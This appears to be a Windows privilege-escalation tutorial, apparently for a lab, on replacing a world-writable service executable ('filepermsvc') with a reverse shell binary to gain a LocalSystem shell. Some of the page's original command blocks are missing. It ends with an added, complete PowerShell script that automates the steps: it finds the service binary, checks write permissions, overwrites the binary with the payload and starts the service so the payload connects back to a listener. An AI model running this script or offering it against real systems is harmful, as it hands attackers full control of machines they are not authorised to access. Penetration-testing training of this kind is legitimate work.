Insecure Service Executables
If the original service executable is writable by our user (directly, or through a group we belong to such as Everyone or Users), we can simply replace it with our reverse shell executable. The next time the service starts, the Service Control Manager runs our binary in the service's security context, which is typically LocalSystem. Remember to create a backup of the original executable before overwriting it if you are exploiting this on a real system, so the service can be restored afterwards.
Run winPEAS to check for service misconfigurations:

Note that the "filepermsvc" service has an executable which appears to be writable by Everyone. We can confirm this with accesschk.exe, checking the rights granted on the executable to Everyone, Users, Authenticated Users and our own account; any write or full-control entry for one of these principals is enough:

Create a backup of the original service executable (a copy with a .bak suffix in the same directory is sufficient).
Copy the reverse shell executable over the service executable, overwriting the original:

Start a listener on Kali, and then start the service to trigger the exploit. Expect the service start to report an error: a plain reverse shell executable never reports its status to the Service Control Manager, so the SCM gives up after its timeout, but by then the payload has already run and connected back. The SCM may also terminate the process when it times out, so migrate or spawn a separate process as soon as the shell arrives.
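The whole procedure above, collected into one PowerShell script as an added example (this is not code from the original page). The service name "filepermsvc" is the one the page discusses; the payload path, the way the binary path is resolved from the registry, and the permission check that stands in for accesschk.exe are assumptions made for the example.

```powershell
# Added example, not from the original page.
# Assumptions: the reverse shell executable has already been uploaded to $payload,
# a listener is already running on Kali, and the current user may start the service.
$svcName = 'filepermsvc'                 # service name from the page
$payload = 'C:\PrivEsc\reverse.exe'     # assumed payload location

# 1. Resolve the service executable from the registry. ImagePath may be quoted,
#    may carry arguments, and may contain environment variables such as %SystemRoot%.
$imagePath = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$svcName").ImagePath
$imagePath = [Environment]::ExpandEnvironmentVariables($imagePath)
if ($imagePath -match '^"([^"]+)"') { $exePath = $Matches[1] }
else { $exePath = ($imagePath -split ' ')[0] }
Write-Host "Service executable: $exePath"

# 2. Confirm write access, as accesschk.exe would: look for an Allow ACE granting
#    write, modify or full control to Everyone, Users, Authenticated Users or us.
$me  = [regex]::Escape($env:USERNAME)
$acl = Get-Acl -Path $exePath
$writable = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.FileSystemRights -match 'Write|Modify|FullControl' -and
    $_.IdentityReference -match "Everyone|\\Users$|Authenticated Users|$me"
}
if (-not $writable) {
    Write-Warning "$exePath does not appear writable by us; this service is not exploitable this way."
    return
}
$writable | Format-Table IdentityReference, FileSystemRights -AutoSize

# 3. Back up the original before touching it (restore with: Copy-Item "$exePath.bak" $exePath -Force)
Copy-Item -Path $exePath -Destination "$exePath.bak" -ErrorAction Stop

# 4. Overwrite the service executable with the payload
Copy-Item -Path $payload -Destination $exePath -Force -ErrorAction Stop

# 5. Start the service. An error such as 1053 (service did not respond in time) is expected;
#    the payload has already executed as the service account and connected back by then.
sc.exe start $svcName
```

Run the script from the low-privileged session after confirming the winPEAS finding; the listener on Kali (for example netcat on the port compiled into the payload, which this example does not fix) must be up before step 5. If the ACL check prints nothing and stops, the finding was a false positive and nothing on disk has been changed.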
